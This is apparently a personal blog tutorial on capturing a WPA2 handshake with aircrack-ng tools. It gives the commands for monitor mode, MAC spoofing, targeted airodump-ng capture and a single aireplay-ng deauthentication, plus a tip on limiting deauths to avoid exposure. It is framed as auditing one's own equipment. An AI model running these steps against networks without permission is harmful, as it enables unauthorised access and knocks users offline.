Lets get on to something more interesting than my boring life.
Without getting in to too much WiFi theory to get on to a WPA2 WiFi network the fist step is to capture the WPA handshake.
This is a 4 way handshake between the AP and device that initiates the connection. Basically the AP and device confirming what the pre-shared key is.
I am not trying to teach WiFi theory or anything like that just pass on my process for capturing handshakes, as always you should only be doing this to equipment you own or have permission to audit.
Now you have to start with a WiFi radio that supports packet injection and monitor mode. Offensive Security has a list of suggested hardware here for their WiFu course. Now aircrack-ng is available no windows but I prefer to use Kali Linux.
Now first thing to do is to bring up a monitor interface and personally set a custom MAC address and disable the wlan0 device.
The next step is to run airodump-ng I normally run this twice the first time for reconnaissance, to get my target ESSID , BSSID and channel.
My attack run I use this command:
"airodump-ng --bssid 20:2B:C1:6B:D8:C5 -c 11 -w BTHub3-3M6H --output-format pcap mon0"
Now lets just break this down a little.
--bssid filters by the bssid of the desired AP
-c locks mon0 on to the desired channel
-w names the capture file the out put would be "/root/BTHub3-3M6H-01.cap"the id number at the end will increment.
--output-format sets the desired format of the output file.
Once this has been run you will get an updating output.
Now as you can see we have detected the AP and a client, in this case my iPhone. In order to capture the WPA handshake we need to de-authenticate the client from the AP.
One thing to be careful of at this stage is flooding with deauth's ( -0 attribute ) this exposes the attack as you are actually transmitting, using my method you are only sending 1 deauth so you may need to rerun this command to capture the WPA handshake.
You have now captured a WPA handshake and can go on to break it using a variety of methods.
Here is my You Tube video to go along with this post.
Now here is a list of every command used - items inside {} are variables that you need to set.
airmon-ng start {wifi interface}
ifconfig {wifi interface} down
ifconfig {monitor interface} down
macchanger -m{desired MAC address} {monitor interface}
ifconfig {monitor interface} up
airodump-ng {monitor interface}
airodump-ng --bssid {bssid} -c {channel} -w {title} --output-format pcap {monitor interface}
airepaly-ng -0 1 -a {bssid} -c {client MAC} {monitor interface}
No comments:
Post a Comment